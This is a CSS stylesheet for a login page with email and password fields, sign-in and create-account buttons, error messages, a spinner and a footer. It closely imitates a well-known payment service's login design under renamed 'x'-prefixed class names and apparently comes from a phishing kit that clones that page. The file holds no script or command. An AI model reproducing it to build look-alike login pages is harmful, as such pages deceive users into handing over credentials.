html {
    background-color: #fff;
    min-height: 100%;
}
* {
    -webkit-box-sizing: border-box;
    -moz-box-sizing: border-box;
    box-sizing: border-box;
}
body {
    min-height: 100%;
    margin: 0;
    padding: 0;
    color: #2c2e2f;
    font-family: HelveticaNeue,"Helvetica Neue",Helvetica,Arial,sans-serif;
    font-size: 93.75%;
    -webkit-font-smoothing: antialiased;
    -webkit-backface-visibility: hidden;
    -moz-text-size-adjust: 100%;
    -ms-text-size-adjust: 100%;
    -webkit-text-size-adjust: 100%;
}

.xcorral {
    margin: 0 auto;
    width: 460px;
    position: relative;
}
::placeholder {
    font-family: HelveticaNeue,"Helvetica Neue",Helvetica,Arial,sans-serif;
    color: #6c7378;
    text-align: left;
}

.xContainer {
    position: relative;
    margin: 130px auto 0;
    padding: 30px 10% 50px;
    -webkit-border-radius: 5px;
    -moz-border-radius: 5px;
    -khtml-border-radius: 5px;
    border-radius: 5px;
}
.xBordered {
    margin: 120px auto 0;
    padding: 42px 42px 36px;
    border: 1px solid #eaeced;
    overflow: hidden;
}

.x-logo {
    background: transparent url(../IMG/xlogo-129x32.svg) top center no-repeat;
        background-size: auto;
    background-size: auto 28px;
    width: 129px;
    height: 32px;
    display: block;
}
.x-logo {
    margin: 0 auto 20px;
    text-indent: 100%;
    overflow: hidden;
    white-space: nowrap;
}
.xmaskable {
    position: relative;
    margin: 0px;
}
.xEmailSection {
    margin-bottom: 20px;
}

.xInput{
    position: relative;
    margin: 0 0 10px;
}
.splitxEmail .xInput, .splitxPassword .xInput {
    margin-bottom: 20px;
}
.fieldWrapper {
    position: relative;
    z-index: 2;
    width: 100%;
}
.xInput .fieldWrapper::before {

    content: "";
    display: block;
    z-index: -1;
    position: absolute;
    top: 0;
    width: 100%;
    height: 40px;
    background-color: #fff;
    -webkit-border-radius: 5px;
    -moz-border-radius: 5px;
    -khtml-border-radius: 5px;
    border-radius: 5px;

}
.xInputBox{
        height: 44px;
        width: 100%;
        padding: 0 10px;
        border: 1px solid #9da3a6;
        background: #fff;
        text-overflow: ellipsis;
        -webkit-box-sizing: border-box;
        -moz-box-sizing: border-box;
        box-sizing: border-box;
        -webkit-border-radius: 4px;
        -moz-border-radius: 4px;
        -khtml-border-radius: 4px;
        border-radius: 4px;
        -webkit-box-shadow: none;
        -moz-box-shadow: none;
        box-shadow: none;
        color: #000;
        font-size: 1em;
        font-family: Helvetica,Arial,sans-serif;
        font-weight: 400;
        direction: ltr;
}

.xbutton {
    width: 100%;
    min-height: 44px;
    padding: 0;
    border: 0;
    display: block;
    background-color: #0070ba;
    -webkit-box-shadow: none;
    -moz-box-shadow: none;
    box-shadow: none;
    -webkit-border-radius: 4px;
    -moz-border-radius: 4px;
    -khtml-border-radius: 4px;
    border-radius: 4px;
    -webkit-box-sizing: border-box;
    -moz-box-sizing: border-box;
    box-sizing: border-box;
    cursor: pointer;
    -webkit-appearance: none;
    -moz-appearance: none;
    -ms-appearance: none;
    -o-appearance: none;
    appearance: none;
    -webkit-tap-highlight-color: transparent;
    color: #fff;
    font-size: 1em;
    text-align: center;
    font-weight: 700;
    font-family: HelveticaNeue-Medium,"Helvetica Neue Medium",HelveticaNeue,"Helvetica Neue",Helvetica,Arial,sans-serif;
    text-shadow: none;
    text-decoration: none;
    -webkit-transition: background-color .4s ease-out;
    -moz-transition: background-color .4s ease-out;
    -o-transition: background-color .4s ease-out;
    transition: background-color .4s ease-out;
    -webkit-font-smoothing: antialiased;
}
.xbutton:hover {
    background-color: #005ea6;
    outline: 0;
}
.xbutton:active {
    background: #00598e;
}
.XSeparator{
    border-top: 1px solid #cbd2d6;
    position: relative;
    margin: 25px 0 10px;
    text-align: center;
}

.XtextInSeparator{
    font-family: HelveticaNeue,"Helvetica Neue",Helvetica,Arial,sans-serif;
    background-color: #fff;
    padding: 0 .5em;
    position: relative;
    color: #6c7378;
    top: -.7em;
}
.XcreateAccount{
    width: 100%;
        min-height: 44px;
        padding: 0;
        border: 0;
        display: block;
        background-color: #0070ba;
        -webkit-box-shadow: none;
        -moz-box-shadow: none;
        box-shadow: none;
        -webkit-border-radius: 4px;
        -moz-border-radius: 4px;
        -khtml-border-radius: 4px;
        border-radius: 4px;
        -webkit-box-sizing: border-box;
        -moz-box-sizing: border-box;
        box-sizing: border-box;
        cursor: pointer;
        -webkit-appearance: none;
        -moz-appearance: none;
        -ms-appearance: none;
        -o-appearance: none;
        appearance: none;
        -webkit-tap-highlight-color: transparent;
        color: #fff;
        font-size: 1em;
        text-align: center;
        font-weight: 700;
        font-family: HelveticaNeue-Medium,"Helvetica Neue Medium",HelveticaNeue,"Helvetica Neue",Helvetica,Arial,sans-serif;
        text-shadow: none;
        text-decoration: none;
        -webkit-transition: background-color .4s ease-out;
        -moz-transition: background-color .4s ease-out;
        -o-transition: background-color .4s ease-out;
        transition: background-color .4s ease-out;
        -webkit-font-smoothing: antialiased;
        padding: 11px;
        background-color: #E1E7EB;
        color: #2C2E2F;
}
.XcreateAccount:hover {
background-color: #d2dbe1;
}
.xfooter{
    position: fixed;
    bottom: 0;
    left: 0;
    right: 0;
    font-size: 11px;
    padding-top: 14px;
    font-size: 11px;
}
.xfooter .txfooter {
    text-align: center;
    padding: 14px;
    background-color: #F7F9FA;
}
.xfooter .txfooter .xfooterGr {
    list-style-type: none;
    text-align: center;
}
ul, ol, li {
    margin: 0;
    padding: 0;
}
.xfooter .txfooter .xfooterGr li {
    display: inline-block;
    margin: 0 10px 0 0;
}
.xfooter .txfooter .xfooterGr li a{
    color: #666;
    white-space: nowrap;
    font-family: HelveticaNeue,"Helvetica Neue",Helvetica,Arial,sans-serif;
    font-weight: 400;
    text-decoration: none;
    -webkit-transition: color .2s ease-out;
    -moz-transition: color .2s ease-out;
    -o-transition: color .2s ease-out;
    transition: color .2s ease-out;
}
.xfooter .txfooter .xfooterGr li:last-child {
    margin: 0;
}
.xfooter .txfooter .xfooterGr li a:hover {
    color: #666;
    white-space: nowrap !important;
    text-decoration: underline;
    outline: 0;
}
.xRememberEmail{
    margin-bottom: 24px;
    text-align: center;
    font-family: HelveticaNeue-Light,"Helvetica Neue Light",HelveticaNeue,"Helvetica Neue",Helvetica,Arial,sans-serif;
}
.xRememberEmail span {
    text-align: center;
    white-space: nowrap;
    overflow: hidden;
    text-overflow: ellipsis;
    vertical-align: top;
    padding-right: 10px;
    max-width: 300px;
    display: inline-block;
    -webkit-font-smoothing: subpixel-antialiased;
    -moz-osx-font-smoothing: grayscale;
}
.xRememberEmail .xphn {
    margin-right: 5px;
}
.xRememberEmail .xem{

}
a {
    color: #0070ba;
    font-family: HelveticaNeue,"Helvetica Neue",Helvetica,Arial,sans-serif;
    font-weight: 400;
    text-decoration: none;
    -webkit-transition: color .2s ease-out;
    -moz-transition: color .2s ease-out;
    -o-transition: color .2s ease-out;
    transition: color .2s ease-out;
}
a:hover, a:focus {
    text-decoration: underline;
    outline: 0;
}
.hide{
    display: none;
}
.xfrgtLink{
    margin: 20px 0;
    text-align: center;
    border-bottom: 0;
}
.xToE .xRememberEmail, .xToE #Xp, .xToP #Xe{
    display: none;
}
.xToE #Xe, .xToP .xRememberEmail, .xToP #Xp{
    display: block;
}
.hasError input::placeholder {
    color: #c72f38;
}
input:focus::placeholder, input:active::placeholder {
    color: #9b989b;
}
.hasError input {
    border: 1px solid #c72f38;
    background-image: url(../IMG/spritex_2x.png);
    background-position: 99% -409px;
    background-position: top -409px right 10px;
    background-size: 25px;
    background-repeat: no-repeat;
}
.xspinner::after {
    content: '';
    position: fixed;
    z-index: -1;
    top: 0;
    right: 0;
    bottom: 0;
    left: 0;
    background: #fff;
    -moz-opacity: .9;
    -khtml-opacity: .9;
    -webkit-opacity: .9;
    opacity: .9;
    -ms-filter: alpha(opacity=90);
    filter: alpha(opacity=90);
}
.xspinner::before {
    content: "";
    display: block;
    margin: 0 auto 10px;
    text-align: center;
    width: 34px;
    height: 34px;
    border-left: 8px solid #000;
    border-left: 8px solid rgba(0,0,0,.2);
    border-right: 8px solid #000;
    border-right: 8px solid rgba(0,0,0,.2);
    border-bottom: 8px solid #000;
    border-bottom: 8px solid rgba(0,0,0,.2);
    border-top: 8px solid #2180c0;
    border-radius: 50px;
    -webkit-animation: rotation .7s infinite linear;
    -moz-animation: rotation .7s infinite linear;
    -o-animation: rotation .7s infinite linear;
    animation: rotation .7s infinite linear;
}
.alpha {
 margin:0;
 font-family:HelveticaNeue,"Helvetica Neue",Helvetica,Arial,sans-serif;
 font-size:1.73333333em;
 font-weight:300;
 color:#2c2e2f
}
.xspinner::after {
    content: '';
    position: fixed;
    z-index: -1;
    top: 0;
    right: 0;
    bottom: 0;
    left: 0;
    background: #fff;
    -moz-opacity: .9;
    -khtml-opacity: .9;
    -webkit-opacity: .9;
    opacity: .9;
    -ms-filter: alpha(opacity=90);
    filter: alpha(opacity=90);

}
.xspinner {
    text-align: center;
}
.xspinner {
    position: fixed;
    top: 43%;
    right: 0;
    bottom: 0;
    left: 0;
    z-index: 9999;
    margin: 0;
    text-align: center;
}
.transFRT {
 -webkit-animation:rightToLeft .25s ease;
 -moz-animation:rightToLeft .25s ease;
 -o-animation:rightToLeft .25s ease;
 animation:rightToLeft .25s ease
}

@-webkit-keyframes rotation {
 from {
  -webkit-transform:rotate(0deg);
  transform:rotate(0deg)
 }
 to {
  -webkit-transform:rotate(359deg);
  transform:rotate(359deg)
 }
}
@-moz-keyframes rotation {
 from {
  -moz-transform:rotate(0deg);
  transform:rotate(0deg)
 }
 to {
  -moz-transform:rotate(359deg);
  transform:rotate(359deg)
 }
}
@-o-keyframes rotation {
 from {
  -o-transform:rotate(0deg);
  transform:rotate(0deg)
 }
 to {
  -o-transform:rotate(359deg);
  transform:rotate(359deg)
 }
}
@keyframes rotation {
 from {
  transform:rotate(0deg)
 }
 to {
  transform:rotate(359deg)
 }
}
@-webkit-keyframes rightToLeft {
 0% {
  -webkit-transform:translateX(100%);
  transform:translateX(100%)
 }
 100% {
  -webkit-transform:translateX(0%);
  transform:translateX(0%)
 }
}
@-moz-keyframes rightToLeft {
 0% {
  -moz-transform:translateX(100%);
  transform:translateX(100%)
 }
 100% {
  -moz-transform:translateX(0%);
  transform:translateX(0%)
 }
}
@-o-keyframes rightToLeft {
 0% {
  -o-transform:translateX(100%);
  transform:translateX(100%)
 }
 100% {
  -o-transform:translateX(0%);
  transform:translateX(0%)
 }
}
.xErr{
    outline: 0;
    margin-bottom: 10px;
    font-size: 13px;
}
.xErr p{
        margin: 0;
        padding: 15px 15px 15px 44px;
        border-radius: 5px;
        border-width: 1px;
        border-style: solid;
        text-align: left;
        font-size: 1em;
        background: url(../IMG/xalert_spritex.png) no-repeat;
        background-size: 20px;
        background-color: #fff7f7;
        background-position: 12px -387px;
        background-position: left 12px top -387px;
        border-color: #c72e2e;
}

/*-------------------- PHONE ------------------*/

@media all and (max-width:767px) {
    .xcorral {
        width: 100%;
    }
    .xContainer{
        margin-top: 30px;
        padding: 0 8% 30px !important;
        width: 100%;
        background-color: #fff;
        border: 0;
    }
}
